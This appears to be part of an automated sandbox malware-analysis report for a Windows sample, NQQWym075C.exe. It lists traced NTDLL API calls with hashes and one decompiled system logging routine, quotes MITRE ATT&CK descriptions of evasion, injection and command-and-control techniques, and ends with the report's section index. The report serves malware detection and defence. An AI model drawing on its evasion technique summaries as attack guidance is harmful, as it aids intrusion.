Instruction Fuzzy Hash: 1AF015B2200208ABCB14DF89CC80EAB77ADAF88750F158148FE0897241C630F811CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 0297835E, Relevance: 1.5, APIs: 1, Instructions: 28memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02962D11,00002000,00003000,00000004), ref: 02978399

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 26761df0d1588cf6a48b63b26dd164a1a186d5894e5de42976aecbbd6a1e84f1
Instruction ID: eeb9380014168aacdddc7a5d9e3f46a08f2d1cdef112599059d70e7af9b677ba
Opcode Fuzzy Hash: 26761df0d1588cf6a48b63b26dd164a1a186d5894e5de42976aecbbd6a1e84f1
Instruction Fuzzy Hash: D4F039B5204189AFDB15DF98DC84CA77BA9BF88210B19869EF94997202C234E815CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 029782AA, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02973CF0,?,?,02973CF0,00000000,FFFFFFFF), ref: 029782D5

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 13f1b1edd2507801c03cc3e01895e43d258a13dfba3466186732e25f93b737d6
Instruction ID: 661f872ba55d902031f6b39e065a7d782cf8c91d2100dfc491c80d3e40d74086
Opcode Fuzzy Hash: 13f1b1edd2507801c03cc3e01895e43d258a13dfba3466186732e25f93b737d6
Instruction Fuzzy Hash: BEE012752102146BD710EFD4CC89FE77B69EF44750F154455FA599B641D530EA018BD0

Uniqueness

Uniqueness Score: -1.00%

Function 029782B0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02973CF0,?,?,02973CF0,00000000,FFFFFFFF), ref: 029782D5

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: e32308511a6c24ea56a56d3ab4ffc827e758ec6c673f93c66375c1185d79c2c4
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 45D01776200214ABD710EF98CC89EA77BADEF88760F154499BA189B242C530FA008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 047D95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D95DA

Memory Dump Source

Source File: 0000000A.00000002.276393755.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 0000000A.00000002.276673820.000000000488B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.276686319.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 867166286dd09b0764312006a8c65692f5a226234462b1d461b955ff75c3e85d
Instruction ID: dae631ac1b9f6a28223511168cc76e5f67a0ebdda26c6fce31c010bfa725b4ee
Opcode Fuzzy Hash: 867166286dd09b0764312006a8c65692f5a226234462b1d461b955ff75c3e85d
Instruction Fuzzy Hash: 1D9002A1202001076115715B4414636400A97E8285B51C131E50095A1DC565D8957165

Uniqueness

Uniqueness Score: -1.00%

Function 047D9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D966A

Memory Dump Source

Source File: 0000000A.00000002.276393755.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 0000000A.00000002.276673820.000000000488B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.276686319.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e35e7eee1f724bd2dc968ef3ea25f89b3af2e594b7d6442a7ed957ba4af523d5
Instruction ID: 10195a9b5d54cf04b484ca811a62cf9e4dbf6d641554e0fe4aab3fad3fff6425
Opcode Fuzzy Hash: e35e7eee1f724bd2dc968ef3ea25f89b3af2e594b7d6442a7ed957ba4af523d5
Instruction Fuzzy Hash: 6E90027120100906F190715B440466A000597D9385F91C125A401A665DCA55DA5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 047D96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D96EA

Memory Dump Source

Source File: 0000000A.00000002.276393755.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 0000000A.00000002.276673820.000000000488B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.276686319.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d9eea4a5efb9ef58cd33e370bbc0de696bcbeae1571f224fa2ab0899904e437e
Instruction ID: cd101a76fa0c9f07cc18e3c5b17ac8c1f2525155b165ac45fbd843fb09fb72c4
Opcode Fuzzy Hash: d9eea4a5efb9ef58cd33e370bbc0de696bcbeae1571f224fa2ab0899904e437e
Instruction Fuzzy Hash: DF90027120108906F120615B840476A000597D8385F55C521A8419669D86D5D8957161

Uniqueness

Uniqueness Score: -1.00%

Function 047D9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D9FEA

Memory Dump Source

Source File: 0000000A.00000002.276393755.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 0000000A.00000002.276673820.000000000488B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.276686319.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dbd9584c9e14cbfeac0c1788d86c0d74074866548417aecef33e609ea98851da
Instruction ID: ab6bd539f2516cf0a86d82c3fe91b44780911636de1eb3ffc646fa44a308ca57
Opcode Fuzzy Hash: dbd9584c9e14cbfeac0c1788d86c0d74074866548417aecef33e609ea98851da
Instruction Fuzzy Hash: 3290027131114506F120615B8404726000597D9285F51C521A4819569D86D5D8957162

Uniqueness

Uniqueness Score: -1.00%

Function 047D9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D986A

Memory Dump Source

Source File: 0000000A.00000002.276393755.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 0000000A.00000002.276673820.000000000488B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.276686319.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ea41c5881b82f92d88e6ea0ce6063e75f10842c323bd8acd9606b910806d6b1
Instruction ID: 71eac34a5c35543ef58f8afa778bfdb0b433bf8b75934a0fc4ed35ce0e7c589c
Opcode Fuzzy Hash: 1ea41c5881b82f92d88e6ea0ce6063e75f10842c323bd8acd9606b910806d6b1
Instruction Fuzzy Hash: 6A90027120100517F121615B4504727000997D82C5F91C522A4419569D9696D956B161

Uniqueness

Uniqueness Score: -1.00%

Function 047D9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D991A

Memory Dump Source

Source File: 0000000A.00000002.276393755.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 0000000A.00000002.276673820.000000000488B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.276686319.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed74962d27c763d38bf13a07783f9e5262d6f3ed942c64e9417921b2e67d9007
Instruction ID: 13a6379118870754b863518492e3693e4796b57586f8e50b03e1c72b7ec18ccc
Opcode Fuzzy Hash: ed74962d27c763d38bf13a07783f9e5262d6f3ed942c64e9417921b2e67d9007
Instruction Fuzzy Hash: 659002B120100506F150715B4404766000597D8385F51C121A9059565E8699DDD976A5

Uniqueness

Uniqueness Score: -1.00%

Function 02978482, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02963B93), ref: 029784BD

Strings

.z`, xrefs: 029784AC, 029784B8

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: ed34ca01a1a4a79f2f37a89cf7ed6b73107232c5e538c1ef80e2850a58389b8a
Instruction ID: ca1960f73a4eec79a7fca787cb11455d4d61f5d07adb7c32cdaeece18fd81dab
Opcode Fuzzy Hash: ed34ca01a1a4a79f2f37a89cf7ed6b73107232c5e538c1ef80e2850a58389b8a
Instruction Fuzzy Hash: 5CE0D8B81242455BDB14FF75D88089737E6BF803147144559E84997616CA36D42A8BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02978490, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02963B93), ref: 029784BD

Strings

.z`, xrefs: 029784AC, 029784B8

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: e20be44b1f1eab09c841dcfb53aef623deaafb1ad9af074f9d6340b26bcda75b
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 67E046B1200208ABDB18EF99CC48EA777ADEF88750F018558FE085B241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02978661, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0296CF72,0296CF72,?,00000000,?,?), ref: 02978620

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 77d5363f72d82462ec5fea4fff80f14dbc8d16f49a4d65e0b48ddc127789a8e5
Instruction ID: d6afd96d748af4fe6c36e0773dc566e6c95b73bc202a6450ca032c165b629ff3
Opcode Fuzzy Hash: 77d5363f72d82462ec5fea4fff80f14dbc8d16f49a4d65e0b48ddc127789a8e5
Instruction Fuzzy Hash: B9015EB62102147BDB10EF98DC88EE777ADEF88360F058559F90D5B241D631E9118BB4

Uniqueness

Uniqueness Score: -1.00%

Function 02978595, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0296CF72,0296CF72,?,00000000,?,?), ref: 02978620

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6134c64e33dbf41e8f29eef78b2f2c2bcf2836b2cb95125cfa22b25b0a901e81
Instruction ID: 53c7101ca630d52f1578cdad74ea59bff0504ef73bf0d7b10caaddc9c158568b
Opcode Fuzzy Hash: 6134c64e33dbf41e8f29eef78b2f2c2bcf2836b2cb95125cfa22b25b0a901e81
Instruction Fuzzy Hash: 54018CB5200244AFDB10DF58DC84EEB7BADEF89354F158588FD8897641C630E815CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 02978450, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(029734D6,?,02973C4F,02973C4F,?,029734D6,?,?,?,?,?,00000000,00000000,?), ref: 0297847D

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 4d17de188037ef3209afd404846c16f4fe6d68aeeca41dfacc50c3001a1ab90d
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 54E012B1200208ABDB14EF99CC44EA777ADAF88650F158558FA085B241C630F9118AF0

Uniqueness

Uniqueness Score: -1.00%

Function 029785F0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0296CF72,0296CF72,?,00000000,?,?), ref: 02978620

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 2a572678d2dbed42c4090b20b3aa9774a4eddec2482031e87f44e3831deb28a5
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 2CE01AB12002086BDB10EF49CC84EE737ADAF88650F018154FA0857241C930E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 029784D0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,00000000,0000000D,?,?,00000001), ref: 029784F8

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: f61f892bcd576a338262d9cdc0deca15590d0aa494bc94732f5f058449060148
Instruction ID: e244efbc565d5c5b2bf4ff65657f856f7d8dd341d2a6e94d79b910851d58f4ad
Opcode Fuzzy Hash: f61f892bcd576a338262d9cdc0deca15590d0aa494bc94732f5f058449060148
Instruction Fuzzy Hash: 38D017726002187BD620EF98CC89FD777ACEF887A0F0580A5BA1C6B241C531BA008AE1

Uniqueness

Uniqueness Score: -1.00%

Function 029784C4, Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(029734D6,?,02973C4F,02973C4F,?,029734D6,?,?,?,?,?,00000000,00000000,?), ref: 0297847D

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8b57812a0cbed7a5b2e781b905e30819b576ee6384743d049dec2b73b6e88208
Instruction ID: ffc841ad82d89469c855831080d35662403c9a4fa3703acc808319658cae895d
Opcode Fuzzy Hash: 8b57812a0cbed7a5b2e781b905e30819b576ee6384743d049dec2b73b6e88208
Instruction Fuzzy Hash: 0EC08CB500104429D32252A0FC40EF2BB1CEBC7BB9B214999F3CC12010843298022A70

Uniqueness

Uniqueness Score: -1.00%

Function 047D967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D9694

Memory Dump Source

Source File: 0000000A.00000002.276393755.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 0000000A.00000002.276673820.000000000488B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.276686319.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ebd1cbfcd860ad335cfcfcd00836ab264f2a891605b8895180b9b81030c0b05
Instruction ID: 4b9088d37006f8d1a018a98b7b9e3dfb85700e65ee5ea896d8c634a962ed8a1a
Opcode Fuzzy Hash: 8ebd1cbfcd860ad335cfcfcd00836ab264f2a891605b8895180b9b81030c0b05
Instruction Fuzzy Hash: B5B09BF19014C5C9F711D7714A08737791077D4745F16C161D2024655A4778D495F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0482FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0482FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E047DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04825720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04825720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0482fdda
0x0482fde2
0x0482fde5
0x0482fdec
0x0482fdfa
0x0482fdff
0x0482fe0a
0x0482fe0f
0x0482fe17
0x0482fe1e
0x0482fe19
0x0482fe19
0x0482fe19
0x0482fe20
0x0482fe21
0x0482fe22
0x0482fe25
0x0482fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0482FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0482FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0482FE2B

Memory Dump Source

Source File: 0000000A.00000002.276393755.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 0000000A.00000002.276673820.000000000488B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.276686319.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 88b37df517fbea510ea6bcdef4d551d5ea362c1489379276923125571fe6529d
Instruction ID: 79bd3b15a49be9ca22ac49a47f16a2d8fa736ba6c1ebc99c6713af0951a936a1
Opcode Fuzzy Hash: 88b37df517fbea510ea6bcdef4d551d5ea362c1489379276923125571fe6529d
Instruction Fuzzy Hash: D1F04C766801007FE6211A45CD01F337F6ADB40730F140305F714951D1EAA2FC60D6F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report NQQWym075C.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Function 00418180, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Function 0041822A, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Function 00418230, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Function 00418360, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 0041835E, Relevance: 1.5, APIs: 1, Instructions: 28
memorynativeCOMMON

Function 004182AA, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Function 004182B0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 00408880, Relevance: .1, Instructions: 92
COMMON

Function 00418450, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Function 00407070, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Function 00418482, Relevance: 1.5, APIs: 1, Instructions: 25
memoryCOMMON

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON